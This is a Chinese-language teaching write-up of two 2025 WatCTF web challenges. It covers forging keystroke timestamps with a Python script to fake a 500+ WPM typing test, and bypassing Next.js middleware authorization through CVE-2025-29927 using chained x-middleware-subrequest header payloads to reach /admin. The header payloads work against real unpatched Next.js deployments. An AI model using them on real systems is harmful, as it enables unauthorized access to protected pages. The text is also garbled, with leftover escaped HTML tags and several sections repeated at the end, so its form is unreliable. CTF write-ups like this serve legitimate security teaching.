2025 WatCTF Web 题解教学文档<\/h1>

1. gooses-typing-test 挑战解析<\/h2>

挑战概述<\/h3>
这是一个打字速度测试挑战，要求打字速度超过500 WPM(每分钟字数)才能通过。<\/p>

关键代码分析<\/h3>

fetch<\/span>(ny<\/span>+<\/span>"\/doneTest"<\/span>,{
<\/span><\/span>    method<\/span>:<\/span>"POST"<\/span>,
<\/span><\/span>    body<\/span>:<\/span>JSON<\/span>.stringify<\/span>({startPoint<\/span>:<\/span>sl<\/span>, typed<\/span>:<\/span>X<\/span>, seed<\/span>:<\/span>k<\/span>}),
<\/span><\/span>    headers<\/span>:<\/span>{"Content-Type"<\/span>:<\/span>"application\/json"<\/span>}
<\/span><\/span>}).then<\/span>(Q<\/span>=>Q<\/span>.json<\/span>()).then<\/span>(Q<\/span>=>{
<\/span><\/span>    console<\/span>.log<\/span>(Q<\/span>),
<\/span><\/span>    E<\/span>(Q<\/span>.msg<\/span>)
<\/span><\/span>})
<\/span><\/span><\/code><\/pre>攻击思路<\/h3>

正常完成打字测试并抓包获取合法请求数据<\/li>
分析数据格式：包含startPoint(开始时间)、typed(打字记录)和seed(种子)<\/li>
修改打字速度使其超过500 WPM<\/li>
<\/ol>
Python自动化脚本<\/h3>
import<\/span> json
<\/span><\/span>
<\/span><\/span># 读取原始数据<\/span>
<\/span><\/span>with<\/span> open('typed_raw.json'<\/span>, 'r'<\/span>, encoding=<\/span>'utf-8'<\/span>) as<\/span> f:
<\/span><\/span>    data =<\/span> json.<\/span>load(f)
<\/span><\/span>typed =<\/span> data['typed'<\/span>]
<\/span><\/span>
<\/span><\/span># 计算总字符数<\/span>
<\/span><\/span>total_chars =<\/span> len(typed)
<\/span><\/span>
<\/span><\/span># 设置目标WPM(如650)<\/span>
<\/span><\/span>target_wpm =<\/span> 650<\/span>
<\/span><\/span>
<\/span><\/span># 计算目标总时间(分钟)<\/span>
<\/span><\/span>target_minutes =<\/span> (total_chars \/<\/span> 5<\/span>) \/<\/span> target_wpm
<\/span><\/span>target_ms =<\/span> target_minutes *<\/span> 60<\/span> *<\/span> 1000<\/span>  # 转换为毫秒<\/span>
<\/span><\/span>
<\/span><\/span># 保持startPoint不变，计算endTime<\/span>
<\/span><\/span>start_time =<\/span> typed[0<\/span>]['time'<\/span>]
<\/span><\/span>end_time =<\/span> start_time +<\/span> target_ms
<\/span><\/span>
<\/span><\/span># 计算平均间隔时间<\/span>
<\/span><\/span>interval =<\/span> (end_time -<\/span> start_time) \/<\/span> (total_chars -<\/span> 1<\/span>)
<\/span><\/span>
<\/span><\/span># 生成新的时间戳列表<\/span>
<\/span><\/span>new_typed =<\/span> []
<\/span><\/span>for<\/span> i, entry in<\/span> enumerate(typed):
<\/span><\/span>    new_entry =<\/span> entry.<\/span>copy()
<\/span><\/span>    new_entry['time'<\/span>] =<\/span> int(start_time +<\/span> i *<\/span> interval)
<\/span><\/span>    new_typed.<\/span>append(new_entry)
<\/span><\/span>
<\/span><\/span># 更新数据并保存<\/span>
<\/span><\/span>data['typed'<\/span>] =<\/span> new_typed
<\/span><\/span><\/code><\/pre>2. Waterloo Trivia Dash 挑战解析<\/h2>
挑战概述<\/h3>
完成三个问题后会显示\/admin链接，但访问会307重定向到根目录。<\/p>
发现<\/h3>

目录扫描发现所有\/admin相关路由都返回307<\/li>
其他不存在的路径返回404<\/li>
使用Next.js框架(版本>=15.0, <15.2.3)<\/li>
<\/ul>
漏洞利用(CVE-2025-29927)<\/h3>
Next.js中间件安全绕过漏洞原理：<\/p>

中间件用于请求到达前的身份验证、授权等操作<\/li>
为防止递归调用导致的无限循环，Next.js引入x-middleware-subrequest头部<\/li>
漏洞点：Next.js只检查头部是否存在，不严格验证值是否合法<\/li>
<\/ol>
攻击步骤<\/h3>

构造恶意请求，添加x-middleware-subrequest头部<\/li>
头部值应为真实存在的中间件路径：

middleware<\/code><\/li>
src\/middleware<\/code><\/li>
<\/ul>
<\/li>
使用冒号分隔创建"路径链"来多次标记已执行<\/li>
<\/ol>
有效Payload示例<\/h3>
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
<\/code><\/pre>
或<\/p>
x-middleware-subrequest: src\/middleware:src\/middleware:src\/middleware:src\/middleware:src\/middleware
<\/code><\/pre>
攻击效果<\/h3>
通过伪造内部子请求链，绕过中间件的授权逻辑，成功访问\/admin路径。<\/p>
总结<\/h2>
这两个挑战展示了：<\/p>

前端逻辑验证的绕过方法(修改时间数据)<\/li>
Next.js中间件安全机制的绕过技巧<\/li>
如何利用版本特定的漏洞(CVE)进行权限提升<\/li>
<\/ol>

2025 WatCTF Web 题解教学文档<\/h1>

1. gooses-typing-test 挑战解析<\/h2>

挑战概述<\/h3> 这是一个打字速度测试挑战，要求打字速度超过500 WPM(每分钟字数)才能通过。<\/p>

2. Waterloo Trivia Dash 挑战解析<\/h2>

挑战概述<\/h3> 完成三个问题后会显示\/admin链接，但访问会307重定向到根目录。<\/p>

攻击效果<\/h3> 通过伪造内部子请求链，绕过中间件的授权逻辑，成功访问\/admin路径。<\/p>

总结<\/h2> 这两个挑战展示了：<\/p> 前端逻辑验证的绕过方法(修改时间数据)<\/li> Next.js中间件安全机制的绕过技巧<\/li> 如何利用版本特定的漏洞(CVE)进行权限提升<\/li> <\/ol>

挑战概述<\/h3>
这是一个打字速度测试挑战，要求打字速度超过500 WPM(每分钟字数)才能通过。<\/p>

挑战概述<\/h3>
完成三个问题后会显示\/admin链接，但访问会307重定向到根目录。<\/p>

攻击效果<\/h3>
通过伪造内部子请求链，绕过中间件的授权逻辑，成功访问\/admin路径。<\/p>

总结<\/h2>
这两个挑战展示了：<\/p>

前端逻辑验证的绕过方法(修改时间数据)<\/li>
Next.js中间件安全机制的绕过技巧<\/li>
如何利用版本特定的漏洞(CVE)进行权限提升<\/li> <\/ol>